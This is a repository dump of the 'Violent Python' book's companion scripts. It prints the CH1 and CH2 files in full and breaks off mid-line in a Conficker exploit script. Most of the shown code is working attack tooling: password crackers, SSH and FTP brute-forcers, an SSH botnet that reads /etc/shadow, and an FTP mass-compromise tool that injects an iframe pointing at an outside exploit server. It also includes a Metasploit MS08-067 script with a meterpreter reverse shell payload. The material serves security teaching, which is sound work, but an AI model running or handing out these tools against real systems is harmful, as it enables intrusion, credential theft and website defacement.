├── CH1
│   ├── .DS_Store
│   ├── 1-vulnScanner.py
│   ├── 2-passwdCrack.py
│   ├── 3-zipCrack.py
│   ├── dictionary.txt
│   ├── evil.zip
│   ├── passwords.txt
│   └── vuln-banners.txt
├── CH2
│   ├── .DS_Store
│   ├── 1-portScan.py
│   ├── 2-nmapScan.py
│   ├── 3-botNet.py
│   ├── 3-bruteKey.py
│   ├── 3-pxsshCommand.py
│   ├── 3-sshBrute.py
│   ├── 3-sshCommand.py
│   ├── 4-anonLogin.py
│   ├── 4-bruteLogin.py
│   ├── 4-defaultPages.py
│   ├── 4-injectPage.py
│   ├── 4-massCompromise.py
│   ├── 5-conficker.py
│   ├── 6-freeFloat.py
│   ├── pass.txt
│   └── userpass.txt
├── CH3
│   ├── .DS_Store
│   ├── 1-discoverNetworks.py
│   ├── 2-dumpRecycleBin.py
│   ├── 3-pdfRead.py
│   ├── 4-exifFetch.py
│   ├── 5-skypeParse.py
│   ├── 6-firefoxParse.py
│   ├── 7-iphoneMessages.py
│   ├── firefox_profile.zip
│   └── skype_profile.zip
├── CH4
│   ├── .DS_Store
│   ├── 1-geoIP.py
│   ├── 10-idsFoil.py
│   ├── 2-printDirection.py
│   ├── 3-geoPrint.py
│   ├── 4-googleEarthPcap.py
│   ├── 5-findDDoS.py
│   ├── 6-spoofDetect.py
│   ├── 7-testFastFlux.py
│   ├── 8-testDomainFlux.py
│   ├── 9-mitnickAttack.py
│   ├── attack.pcap
│   ├── domainFlux.pcap
│   ├── download.pcap
│   ├── fastFlux.pcap
│   ├── geotest.kml
│   ├── geotest.pcap
│   └── hivemind.pcap
├── CH5
│   ├── .DS_Store
│   ├── 1-testSniff.py
│   ├── 10-iphoneFinder.py
│   ├── 11-rfcommScan.py
│   ├── 12-sdpScan.py
│   ├── 13-ninjaPrint.py
│   ├── 14-blueBug.py
│   ├── 2-creditSniff.py
│   ├── 3-hotelSniff.py
│   ├── 4-googleSniff.py
│   ├── 5-ftpSniff.py
│   ├── 6-sniffHidden.py
│   ├── 6-sniffProbe.py
│   ├── 7-dup.py
│   ├── 7-uavSniff.py
│   ├── 8-fireCatcher.py
│   ├── 9-btFind.py
│   ├── 9-btScan.py
│   └── dup.py
├── CH6
│   ├── .DS_Store
│   ├── .project
│   ├── .pydevproject
│   ├── .svn
│   │   ├── entries
│   │   ├── prop-base
│   │   │   ├── twitter.pyc.svn-base
│   │   │   ├── violent_browser.pyc.svn-base
│   │   │   ├── violent_email.pyc.svn-base
│   │   │   ├── violent_person.pyc.svn-base
│   │   │   └── web_common.pyc.svn-base
│   │   └── text-base
│   │       ├── .project.svn-base
│   │       ├── .pydevproject.svn-base
│   │       ├── anon_scrape.py.svn-base
│   │       ├── basic_usage.py.svn-base
│   │       ├── create_browser.py.svn-base
│   │       ├── facebook.py.svn-base
│   │       ├── google.py.svn-base
│   │       ├── parse_webpage.py.svn-base
│   │       ├── phishing.py.svn-base
│   │       ├── quarkbase.py.svn-base
│   │       ├── simple_scrape.py.svn-base
│   │       ├── temp.html.svn-base
│   │       ├── test.py.svn-base
│   │       ├── twitter.py.svn-base
│   │       ├── twitter.pyc.svn-base
│   │       ├── twitter_interests.py.svn-base
│   │       ├── twitter_locate.py.svn-base
│   │       ├── violent_browser.py.svn-base
│   │       ├── violent_browser.pyc.svn-base
│   │       ├── violent_email.py.svn-base
│   │       ├── violent_email.pyc.svn-base
│   │       ├── violent_person.py.svn-base
│   │       ├── violent_person.pyc.svn-base
│   │       ├── web_common.py.svn-base
│   │       └── web_common.pyc.svn-base
│   ├── 1-viewPage.py
│   ├── 10-sendMail.py
│   ├── 10-sendSpam.py
│   ├── 2-proxyTest.py
│   ├── 3-userAgentTest.py
│   ├── 4-printCookies.py
│   ├── 5-kittenTest.py
│   ├── 6-linkParser.py
│   ├── 7-imageMirror.py
│   ├── 8-anonGoogle.py
│   ├── 8-googleJson.py
│   ├── 8-googleJumbled.py
│   ├── 9-twitterClass.py
│   ├── 9-twitterGeo.py
│   ├── 9-twitterInterests.py
│   ├── 9-twitterRecon.py
│   ├── anonBrowser.py
│   ├── anonBrowser.pyc
│   ├── mlb-cities.txt
│   └── twitterClass.py
├── CH7
│   ├── .DS_Store
│   ├── 1-bindshell.py
│   └── 2-virusCheck.py
├── README.md
└── Violent Python - A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers.pdf

/CH1/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH1/.DS_Store

--------------------------------------------------------------------------------
/CH1/1-vulnScanner.py:
--------------------------------------------------------------------------------
1 | 
2 | import socket
3 | import os
4 | import sys
5 | 
6 | 
7 | def retBanner(ip, port):
8 |     try:
9 |         socket.setdefaulttimeout(2)
10 |         s = socket.socket()
11 |         s.connect((ip, port))
12 |         banner = s.recv(1024)
13 |         return banner
14 |     except:
15 |         return
16 | 
17 | 
18 | def checkVulns(banner, filename):
19 | 
20 |     f = open(filename, 'r')
21 |     for line in f.readlines():
22 |         if line.strip('\n') in banner:
23 |             print('[+] Server is vulnerable: ' + banner.strip('\n'))
24 | 
25 | 
26 | 
27 | def main():
28 | 
29 |     if len(sys.argv) == 2:
30 |         filename = sys.argv[1]
31 |         if not os.path.isfile(filename):
32 |             print('[-] ' + filename +\
33 |                 ' does not exist.')
34 |             exit(0)
35 | 
36 |         if not os.access(filename, os.R_OK):
37 |             print('[-] ' + filename +\
38 |                 ' access denied.')
39 |             exit(0)
40 |     else:
41 |         print('[-] Usage: ' + str(sys.argv[0]) +\
42 |             ' <vuln filename>')
43 |         exit(0)
44 | 
45 |     portList = [21,22,25,80,110,443]
46 |     for x in range(147, 150):
47 |         ip = '192.168.95.' + str(x)
48 |         for port in portList:
49 |             banner = retBanner(ip, port)
50 |             if banner:
51 |                 print('[+] ' + ip + ' : ' + banner)
52 |                 checkVulns(banner, filename)
53 | 
54 | 
55 | if __name__ == '__main__':
56 |     main()
57 | 

--------------------------------------------------------------------------------
/CH1/2-passwdCrack.py:
--------------------------------------------------------------------------------
1 | import crypt
2 | 
3 | 
4 | def testPass(cryptPass):
5 |     salt = cryptPass[0:2]
6 |     dictFile = open('dictionary.txt', 'r')
7 |     for word in dictFile.readlines():
8 |         word = word.strip('\n')
9 |         cryptWord = crypt.crypt(word, salt)
10 |         if cryptWord == cryptPass:
11 |             print('[+] Found Password: '+ word + '\n')
12 |             return
13 |     print('[-] Password Not Found.\n')
14 |     return
15 | 
16 | 
17 | def main():
18 |     passFile = open('passwords.txt')
19 |     for line in passFile.readlines():
20 |         if ':' in line:
21 |             user = line.split(':')[0]
22 |             cryptPass = line.split(':')[1].strip(' ')
23 |             print('[*] Cracking Password For: ' + user)
24 |             testPass(cryptPass)
25 | 
26 | 
27 | if __name__ == '__main__':
28 |     main()
29 | 

--------------------------------------------------------------------------------
/CH1/3-zipCrack.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | import zipfile
4 | import optparse
5 | from threading import Thread
6 | 
7 | 
8 | def extractFile(zFile, password):
9 |     try:
10 |         zFile.extractall(pwd=password)
11 |         print('[+] Found password ' + password + '\n')
12 |     except:
13 |         pass
14 | 
15 | 
16 | def main():
17 |     parser = optparse.OptionParser("usage %prog "+\
18 |         "-f <zipfile> -d <dictionary>")
19 |     parser.add_option('-f', dest='zname', type='string',\
20 |         help='specify zip file')
21 |     parser.add_option('-d', dest='dname', type='string',\
22 |         help='specify dictionary file')
23 |     (options, args) = parser.parse_args()
24 |     if (options.zname == None) | (options.dname == None):
25 |         print(parser.usage)
26 |         exit(0)
27 |     else:
28 |         zname = options.zname
29 |         dname = options.dname
30 | 
31 |     zFile = zipfile.ZipFile(zname)
32 |     passFile = open(dname)
33 | 
34 |     for line in passFile.readlines():
35 |         password = line.strip('\n')
36 |         t = Thread(target=extractFile, args=(zFile, password))
37 |         t.start()
38 | 
39 | 
40 | if __name__ == '__main__':
41 |     main()
42 | 

--------------------------------------------------------------------------------
/CH1/dictionary.txt:
--------------------------------------------------------------------------------
1 | apple
2 | orange
3 | egg
4 | lemon
5 | grapes
6 | secret
7 | strawberry
8 | password
9 | 
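A quick way to sanity-check the CH1 crack scripts against the bundled data files (a minimal sketch, assuming a Unix Python where the crypt module is available; the hash below is the 'victim' entry from passwords.txt):

import crypt

# the salt for classic crypt() hashes is the first two characters of the hash
cryptPass = 'HX9LLTdc/jiDE'
for word in open('dictionary.txt'):
    word = word.strip('\n')
    if crypt.crypt(word, cryptPass[0:2]) == cryptPass:
        print('[+] Found Password: ' + word)
        break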
-------------------------------------------------------------------------------- /CH1/evil.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH1/evil.zip -------------------------------------------------------------------------------- /CH1/passwords.txt: -------------------------------------------------------------------------------- 1 | victim: HX9LLTdc/jiDE: 503:100:Iama Victim:/home/victim:/bin/sh 2 | root: DFNFxgW7C05fo: 504:100: Markus Hess:/root:/bin/bash 3 | -------------------------------------------------------------------------------- /CH1/vuln-banners.txt: -------------------------------------------------------------------------------- 1 | 3Com 3CDaemon FTP Server Version 2.0 2 | Ability Server 2.34 3 | 4 | CCProxy Telnet Service Ready 5 | 6 | ESMTP TABS Mail Server for Windows NT 7 | 8 | FreeFloat Ftp Server (Version 1.00) 9 | 10 | IMAP4rev1 MDaemon 9.6.4 ready 11 | 12 | MailEnable Service, Version: 0-1.54 13 | 14 | NetDecision-HTTP-Server 1.0 15 | PSO Proxy 0.9 16 | 17 | SAMBAR 18 | 19 | Sami FTP Server 2.0.2 20 | 21 | Spipe 1.0 22 | 23 | TelSrv 1.5 24 | 25 | WDaemon 6.8.5 26 | 27 | WinGate 6.1.1 28 | Xitami 29 | 30 | YahooPOPs! Simple Mail Transfer Service Ready 31 | -------------------------------------------------------------------------------- /CH2/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH2/.DS_Store -------------------------------------------------------------------------------- /CH2/1-portScan.py: -------------------------------------------------------------------------------- 1 | import optparse 2 | from socket import * 3 | from threading import * 4 | 5 | screenLock = Semaphore(value=1) 6 | 7 | def connScan(tgtHost, tgtPort): 8 | try: 9 | connSkt = socket(AF_INET, SOCK_STREAM) 10 | connSkt.connect((tgtHost, tgtPort)) 11 | connSkt.send('ViolentPython\r\n') 12 | results = connSkt.recv(100) 13 | screenLock.acquire() 14 | print('[+] %d/tcp open' % tgtPort) 15 | print('[+] ' + str(results)) 16 | except: 17 | screenLock.acquire() 18 | print('[-] %d/tcp closed' % tgtPort) 19 | finally: 20 | screenLock.release() 21 | connSkt.close() 22 | 23 | def portScan(tgtHost, tgtPorts): 24 | try: 25 | tgtIP = gethostbyname(tgtHost) 26 | except: 27 | print("[-] Cannot resolve '%s': Unknown host" %tgtHost) 28 | return 29 | 30 | try: 31 | tgtName = gethostbyaddr(tgtIP) 32 | print('\n[+] Scan Results for: ' + tgtName[0]) 33 | except: 34 | print('\n[+] Scan Results for: ' + tgtIP) 35 | 36 | setdefaulttimeout(1) 37 | for tgtPort in tgtPorts: 38 | t = Thread(target=connScan,args=(tgtHost,int(tgtPort))) 39 | t.start() 40 | 41 | def main(): 42 | parser = optparse.OptionParser('usage %prog '+\ 43 | '-H -p ') 44 | parser.add_option('-H', dest='tgtHost', type='string',\ 45 | help='specify target host') 46 | parser.add_option('-p', dest='tgtPort', type='string',\ 47 | help='specify target port[s] separated by comma') 48 | 49 | (options, args) = parser.parse_args() 50 | 51 | tgtHost = options.tgtHost 52 | tgtPorts = str(options.tgtPort).split(',') 53 | 54 | if (tgtHost == None) | (tgtPorts[0] == None): 55 | print(parser.usage) 56 | exit(0) 57 | 58 | portScan(tgtHost, tgtPorts) 59 | 60 | 61 | if __name__ == '__main__': 62 | main() 63 | 
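Note that the CH2 scripts are written for Python 2 (print statements, str-typed sockets, pxssh). A rough Python 3 equivalent of connScan above, offered only as a sketch for readers on a modern interpreter (the host and port below are placeholders):

import socket

def conn_scan(host, port):
    try:
        # Python 3 sockets send and receive bytes, hence the b'' literal
        with socket.create_connection((host, port), timeout=1) as s:
            s.send(b'ViolentPython\r\n')
            print('[+] %d/tcp open: %r' % (port, s.recv(100)))
    except OSError:
        print('[-] %d/tcp closed' % port)

conn_scan('127.0.0.1', 80)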
-------------------------------------------------------------------------------- /CH2/2-nmapScan.py: -------------------------------------------------------------------------------- 1 | import nmap 2 | import optparse 3 | 4 | def nmapScan(tgtHost,tgtPort): 5 | nmScan = nmap.PortScanner() 6 | nmScan.scan(tgtHost,tgtPort) 7 | state=nmScan[tgtHost]['tcp'][int(tgtPort)]['state'] 8 | print "[*] " + tgtHost + " tcp/"+tgtPort +" "+state 9 | 10 | def main(): 11 | parser = optparse.OptionParser('usage %prog '+\ 12 | '-H -p ') 13 | parser.add_option('-H', dest='tgtHost', type='string',\ 14 | help='specify target host') 15 | parser.add_option('-p', dest='tgtPort', type='string',\ 16 | help='specify target port[s] separated by comma') 17 | 18 | (options, args) = parser.parse_args() 19 | 20 | tgtHost = options.tgtHost 21 | tgtPorts = str(options.tgtPort).split(',') 22 | 23 | if (tgtHost == None) | (tgtPorts[0] == None): 24 | print parser.usage 25 | exit(0) 26 | for tgtPort in tgtPorts: 27 | nmapScan(tgtHost, tgtPort) 28 | 29 | 30 | if __name__ == '__main__': 31 | main() 32 | 33 | -------------------------------------------------------------------------------- /CH2/3-botNet.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import optparse 4 | import pxssh 5 | 6 | 7 | class Client: 8 | 9 | def __init__(self, host, user, password): 10 | self.host = host 11 | self.user = user 12 | self.password = password 13 | self.session = self.connect() 14 | 15 | def connect(self): 16 | try: 17 | s = pxssh.pxssh() 18 | s.login(self.host, self.user, self.password) 19 | return s 20 | except Exception, e: 21 | print e 22 | print '[-] Error Connecting' 23 | 24 | def send_command(self, cmd): 25 | self.session.sendline(cmd) 26 | self.session.prompt() 27 | return self.session.before 28 | 29 | 30 | def botnetCommand(command): 31 | for client in botNet: 32 | output = client.send_command(command) 33 | print '[*] Output from ' + client.host 34 | print '[+] ' + output 35 | 36 | 37 | def addClient(host, user, password): 38 | client = Client(host, user, password) 39 | botNet.append(client) 40 | 41 | 42 | botNet = [] 43 | addClient('127.0.0.1', 'root', 'toor') 44 | addClient('127.0.0.1', 'root', 'toor') 45 | addClient('127.0.0.1', 'root', 'toor') 46 | 47 | botnetCommand('uname -v') 48 | botnetCommand('cat /etc/issue') 49 | -------------------------------------------------------------------------------- /CH2/3-bruteKey.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import pexpect 4 | import optparse 5 | import os 6 | from threading import * 7 | 8 | maxConnections = 5 9 | connection_lock = BoundedSemaphore(value=maxConnections) 10 | Stop = False 11 | Fails = 0 12 | 13 | 14 | def connect(user,host,keyfile,release): 15 | global Stop 16 | global Fails 17 | try: 18 | perm_denied = 'Permission denied' 19 | ssh_newkey = 'Are you sure you want to continue' 20 | conn_closed = 'Connection closed by remote host' 21 | opt = ' -o PasswordAuthentication=no' 22 | connStr = 'ssh ' + user +\ 23 | '@' + host + ' -i ' + keyfile + opt 24 | child = pexpect.spawn(connStr) 25 | ret = child.expect([pexpect.TIMEOUT,perm_denied,\ 26 | ssh_newkey,conn_closed,'$','#',]) 27 | if ret == 2: 28 | print '[-] Adding Host to ~/.ssh/known_hosts' 29 | child.sendline('yes') 30 | connect(user, host, keyfile, False) 31 | elif ret == 3: 32 | print '[-] Connection Closed By Remote Host' 33 | Fails 
+= 1 34 | elif ret > 3: 35 | print '[+] Success. ' + str(keyfile) 36 | Stop = True 37 | finally: 38 | if release: 39 | connection_lock.release() 40 | 41 | 42 | def main(): 43 | parser = optparse.OptionParser('usage %prog -H '+\ 44 | ' -u -d ') 45 | parser.add_option('-H', dest='tgtHost', type='string',\ 46 | help='specify target host') 47 | parser.add_option('-d', dest='passDir', type='string',\ 48 | help='specify directory with keys') 49 | parser.add_option('-u', dest='user', type='string',\ 50 | help='specify the user') 51 | 52 | (options, args) = parser.parse_args() 53 | host = options.tgtHost 54 | passDir = options.passDir 55 | user = options.user 56 | 57 | if host == None or passDir == None or user == None: 58 | print parser.usage 59 | exit(0) 60 | 61 | for filename in os.listdir(passDir): 62 | if Stop: 63 | print '[*] Exiting: Key Found.' 64 | exit(0) 65 | if Fails > 5: 66 | print '[!] Exiting: '+\ 67 | 'Too Many Connections Closed By Remote Host.' 68 | print '[!] Adjust number of simultaneous threads.' 69 | exit(0) 70 | connection_lock.acquire() 71 | fullpath = os.path.join(passDir, filename) 72 | print '[-] Testing keyfile ' + str(fullpath) 73 | t = Thread(target=connect,\ 74 | args=(user, host, fullpath, True)) 75 | child = t.start() 76 | 77 | 78 | if __name__ == '__main__': 79 | main() 80 | -------------------------------------------------------------------------------- /CH2/3-pxsshCommand.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import pxssh 4 | 5 | 6 | def send_command(s, cmd): 7 | s.sendline(cmd) 8 | s.prompt() 9 | print s.before 10 | 11 | 12 | def connect(host, user, password): 13 | try: 14 | s = pxssh.pxssh() 15 | s.login(host, user, password) 16 | return s 17 | except: 18 | print '[-] Error Connecting' 19 | exit(0) 20 | 21 | s = connect('127.0.0.1', 'root', 'toor') 22 | send_command(s, 'cat /etc/shadow | grep root') 23 | 24 | -------------------------------------------------------------------------------- /CH2/3-sshBrute.py: -------------------------------------------------------------------------------- 1 | import pxssh 2 | import optparse 3 | import time 4 | from threading import * 5 | 6 | maxConnections = 5 7 | connection_lock = BoundedSemaphore(value=maxConnections) 8 | 9 | Found = False 10 | Fails = 0 11 | 12 | def connect(host, user, password, release): 13 | global Found 14 | global Fails 15 | 16 | try: 17 | s = pxssh.pxssh() 18 | s.login(host, user, password) 19 | print '[+] Password Found: ' + password 20 | Found = True 21 | except Exception, e: 22 | if 'read_nonblocking' in str(e): 23 | Fails += 1 24 | time.sleep(5) 25 | connect(host, user, password, False) 26 | elif 'synchronize with original prompt' in str(e): 27 | time.sleep(1) 28 | connect(host, user, password, False) 29 | 30 | finally: 31 | if release: connection_lock.release() 32 | 33 | def main(): 34 | parser = optparse.OptionParser('usage %prog '+\ 35 | '-H -u -F ' 36 | ) 37 | parser.add_option('-H', dest='tgtHost', type='string',\ 38 | help='specify target host') 39 | parser.add_option('-F', dest='passwdFile', type='string',\ 40 | help='specify password file') 41 | parser.add_option('-u', dest='user', type='string',\ 42 | help='specify the user') 43 | 44 | (options, args) = parser.parse_args() 45 | host = options.tgtHost 46 | passwdFile = options.passwdFile 47 | user = options.user 48 | 49 | if host == None or passwdFile == None or user == None: 50 | print parser.usage 51 | exit(0) 52 | 53 | fn = 
open(passwdFile, 'r') 54 | for line in fn.readlines(): 55 | 56 | if Found: 57 | print "[*] Exiting: Password Found" 58 | exit(0) 59 | if Fails > 5: 60 | print "[!] Exiting: Too Many Socket Timeouts" 61 | exit(0) 62 | 63 | connection_lock.acquire() 64 | password = line.strip('\r').strip('\n') 65 | print "[-] Testing: "+str(password) 66 | t = Thread(target=connect, args=(host, user,\ 67 | password, True)) 68 | child = t.start() 69 | 70 | if __name__ == '__main__': 71 | main() 72 | 73 | -------------------------------------------------------------------------------- /CH2/3-sshCommand.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import pexpect 4 | 5 | PROMPT = ['# ', '>>> ', '> ','\$ '] 6 | 7 | def send_command(child, cmd): 8 | child.sendline(cmd) 9 | child.expect(PROMPT) 10 | print child.before 11 | 12 | def connect(user, host, password): 13 | ssh_newkey = 'Are you sure you want to continue connecting' 14 | connStr = 'ssh ' + user + '@' + host 15 | child = pexpect.spawn(connStr) 16 | ret = child.expect([pexpect.TIMEOUT, ssh_newkey,\ 17 | '[P|p]assword:']) 18 | 19 | if ret == 0: 20 | print '[-] Error Connecting' 21 | return 22 | 23 | if ret == 1: 24 | child.sendline('yes') 25 | ret = child.expect([pexpect.TIMEOUT, \ 26 | '[P|p]assword:']) 27 | if ret == 0: 28 | print '[-] Error Connecting' 29 | return 30 | 31 | child.sendline(password) 32 | child.expect(PROMPT) 33 | return child 34 | 35 | 36 | def main(): 37 | host = 'localhost' 38 | user = 'root' 39 | password = 'toor' 40 | 41 | child = connect(user, host, password) 42 | send_command(child, 'cat /etc/shadow | grep root') 43 | 44 | if __name__ == '__main__': 45 | main() 46 | 47 | -------------------------------------------------------------------------------- /CH2/4-anonLogin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import ftplib 5 | 6 | def anonLogin(hostname): 7 | try: 8 | ftp = ftplib.FTP(hostname) 9 | ftp.login('anonymous', 'me@your.com') 10 | print '\n[*] ' + str(hostname) +\ 11 | ' FTP Anonymous Logon Succeeded.' 12 | ftp.quit() 13 | return True 14 | except Exception, e: 15 | print '\n[-] ' + str(hostname) +\ 16 | ' FTP Anonymous Logon Failed.' 17 | return False 18 | 19 | 20 | host = '192.168.95.179' 21 | anonLogin(host) 22 | -------------------------------------------------------------------------------- /CH2/4-bruteLogin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import ftplib, time 5 | 6 | def bruteLogin(hostname, passwdFile): 7 | pF = open(passwdFile, 'r') 8 | for line in pF.readlines(): 9 | time.sleep(1) 10 | userName = line.split(':')[0] 11 | passWord = line.split(':')[1].strip('\r').strip('\n') 12 | print "[+] Trying: "+userName+"/"+passWord 13 | try: 14 | ftp = ftplib.FTP(hostname) 15 | ftp.login(userName, passWord) 16 | print '\n[*] ' + str(hostname) +\ 17 | ' FTP Logon Succeeded: '+userName+"/"+passWord 18 | ftp.quit() 19 | return (userName, passWord) 20 | except Exception, e: 21 | pass 22 | print '\n[-] Could not brute force FTP credentials.' 
23 |     return (None, None)
24 | 
25 | 
26 | host = '192.168.95.179'
27 | passwdFile = 'userpass.txt'
28 | bruteLogin(host, passwdFile)
29 | 

--------------------------------------------------------------------------------
/CH2/4-defaultPages.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | import ftplib
4 | 
5 | 
6 | def returnDefault(ftp):
7 |     try:
8 |         dirList = ftp.nlst()
9 |     except:
10 |         dirList = []
11 |         print '[-] Could not list directory contents.'
12 |         print '[-] Skipping To Next Target.'
13 |         return
14 | 
15 |     retList = []
16 |     for fileName in dirList:
17 |         fn = fileName.lower()
18 |         if '.php' in fn or '.htm' in fn or '.asp' in fn:
19 |             print '[+] Found default page: ' + fileName
20 |             retList.append(fileName)
21 |     return retList
22 | 
23 | 
24 | host = '192.168.95.179'
25 | userName = 'guest'
26 | passWord = 'guest'
27 | ftp = ftplib.FTP(host)
28 | ftp.login(userName, passWord)
29 | returnDefault(ftp)
30 | 

--------------------------------------------------------------------------------
/CH2/4-injectPage.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | 
4 | import ftplib
5 | 
6 | 
7 | def injectPage(ftp, page, redirect):
8 |     f = open(page + '.tmp', 'w')
9 |     ftp.retrlines('RETR ' + page, f.write)
10 |     print '[+] Downloaded Page: ' + page
11 | 
12 |     f.write(redirect)
13 |     f.close()
14 |     print '[+] Injected Malicious IFrame on: ' + page
15 | 
16 |     ftp.storlines('STOR ' + page, open(page + '.tmp'))
17 |     print '[+] Uploaded Injected Page: ' + page
18 | 
19 | 
20 | host = '192.168.95.179'
21 | userName = 'guest'
22 | passWord = 'guest'
23 | ftp = ftplib.FTP(host)
24 | ftp.login(userName, passWord)
25 | redirect = '<iframe src='+\
26 |     '"http://10.10.10.112:8080/exploit"></iframe>'  # URL as given in the book's example; point it at your own exploit server
27 | injectPage(ftp, 'index.html', redirect)
28 | 

--------------------------------------------------------------------------------
/CH2/4-massCompromise.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | import ftplib
4 | import optparse
5 | import time
6 | 
7 | 
8 | def anonLogin(hostname):
9 |     try:
10 |         ftp = ftplib.FTP(hostname)
11 |         ftp.login('anonymous', 'me@your.com')
12 |         print '\n[*] ' + str(hostname) \
13 |             + ' FTP Anonymous Logon Succeeded.'
14 |         ftp.quit()
15 |         return True
16 |     except Exception, e:
17 |         print '\n[-] ' + str(hostname) +\
18 |             ' FTP Anonymous Logon Failed.'
19 |         return False
20 | 
21 | 
22 | def bruteLogin(hostname, passwdFile):
23 |     pF = open(passwdFile, 'r')
24 |     for line in pF.readlines():
25 |         time.sleep(1)
26 |         userName = line.split(':')[0]
27 |         passWord = line.split(':')[1].strip('\r').strip('\n')
28 |         print '[+] Trying: ' + userName + '/' + passWord
29 |         try:
30 |             ftp = ftplib.FTP(hostname)
31 |             ftp.login(userName, passWord)
32 |             print '\n[*] ' + str(hostname) +\
33 |                 ' FTP Logon Succeeded: '+userName+'/'+passWord
34 |             ftp.quit()
35 |             return (userName, passWord)
36 |         except Exception, e:
37 |             pass
38 |     print '\n[-] Could not brute force FTP credentials.'
39 |     return (None, None)
40 | 
41 | 
42 | def returnDefault(ftp):
43 |     try:
44 |         dirList = ftp.nlst()
45 |     except:
46 |         dirList = []
47 |         print '[-] Could not list directory contents.'
48 |         print '[-] Skipping To Next Target.'
49 |         return
50 | 
51 |     retList = []
52 |     for fileName in dirList:
53 |         fn = fileName.lower()
54 |         if '.php' in fn or '.htm' in fn or '.asp' in fn:
55 |             print '[+] Found default page: ' + fileName
56 |             retList.append(fileName)
57 |     return retList
58 | 
59 | 
60 | def injectPage(ftp, page, redirect):
61 |     f = open(page + '.tmp', 'w')
62 |     ftp.retrlines('RETR ' + page, f.write)
63 |     print '[+] Downloaded Page: ' + page
64 | 
65 |     f.write(redirect)
66 |     f.close()
67 |     print '[+] Injected Malicious IFrame on: ' + page
68 | 
69 |     ftp.storlines('STOR ' + page, open(page + '.tmp'))
70 |     print '[+] Uploaded Injected Page: ' + page
71 | 
72 | 
73 | def attack(username,password,tgtHost,redirect):
74 |     ftp = ftplib.FTP(tgtHost)
75 |     ftp.login(username, password)
76 |     defPages = returnDefault(ftp)
77 |     for defPage in defPages:
78 |         injectPage(ftp, defPage, redirect)
79 | 
80 | 
81 | def main():
82 |     parser = optparse.OptionParser('usage %prog '+\
83 |         '-H <target host[s]> -r <redirect page> '+\
84 |         '[-f <userpass file>]')
85 | 
86 |     parser.add_option('-H', dest='tgtHosts',\
87 |         type='string', help='specify target host')
88 |     parser.add_option('-f', dest='passwdFile',\
89 |         type='string', help='specify user/password file')
90 |     parser.add_option('-r', dest='redirect',\
91 |         type='string',help='specify a redirection page')
92 | 
93 |     (options, args) = parser.parse_args()
94 |     tgtHosts = str(options.tgtHosts).split(',')
95 |     passwdFile = options.passwdFile
96 |     redirect = options.redirect
97 | 
98 |     if tgtHosts == None or redirect == None:
99 |         print parser.usage
100 |         exit(0)
101 | 
102 |     for tgtHost in tgtHosts:
103 |         username = None
104 |         password = None
105 | 
106 |         if anonLogin(tgtHost) == True:
107 |             username = 'anonymous'
108 |             password = 'me@your.com'
109 |             print '[+] Using Anonymous Creds to attack'
110 |             attack(username, password, tgtHost, redirect)
111 | 
112 |         elif passwdFile != None:
113 |             (username, password) =\
114 |                 bruteLogin(tgtHost, passwdFile)
115 |             if password != None:
116 |                 print '[+] Using Creds: ' +\
117 |                     username + '/' + password + ' to attack'
118 |                 attack(username, password, tgtHost, redirect)
119 | 
120 | if __name__ == '__main__':
121 |     main()
122 | 

--------------------------------------------------------------------------------
/CH2/5-conficker.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | import os
4 | import optparse
5 | import sys
6 | import nmap
7 | 
8 | 
9 | def findTgts(subNet):
10 |     nmScan = nmap.PortScanner()
11 |     nmScan.scan(subNet, '445')
12 |     tgtHosts = []
13 |     for host in nmScan.all_hosts():
14 |         if nmScan[host].has_tcp(445):
15 |             state = nmScan[host]['tcp'][445]['state']
16 |             if state == 'open':
17 |                 print '[+] Found Target Host: ' + host
18 |                 tgtHosts.append(host)
19 |     return tgtHosts
20 | 
21 | 
22 | def setupHandler(configFile, lhost, lport):
23 |     configFile.write('use exploit/multi/handler\n')
24 |     configFile.write('set payload '+\
25 |         'windows/meterpreter/reverse_tcp\n')
26 |     configFile.write('set LPORT ' + str(lport) + '\n')
27 |     configFile.write('set LHOST ' + lhost + '\n')
28 |     configFile.write('exploit -j -z\n')
29 |     configFile.write('setg DisablePayloadHandler 1\n')
30 | 
31 | 
32 | def confickerExploit(configFile,tgtHost,lhost,lport):
33 |     configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
34 |     configFile.write('set RHOST ' + str(tgtHost) + '\n')
35 |     configFile.write('set payload '+\
36 |         'windows/meterpreter/reverse_tcp\n')
37 |     configFile.write('set LPORT ' + str(lport) + '\n')
38 |     configFile.write('set LHOST ' + 
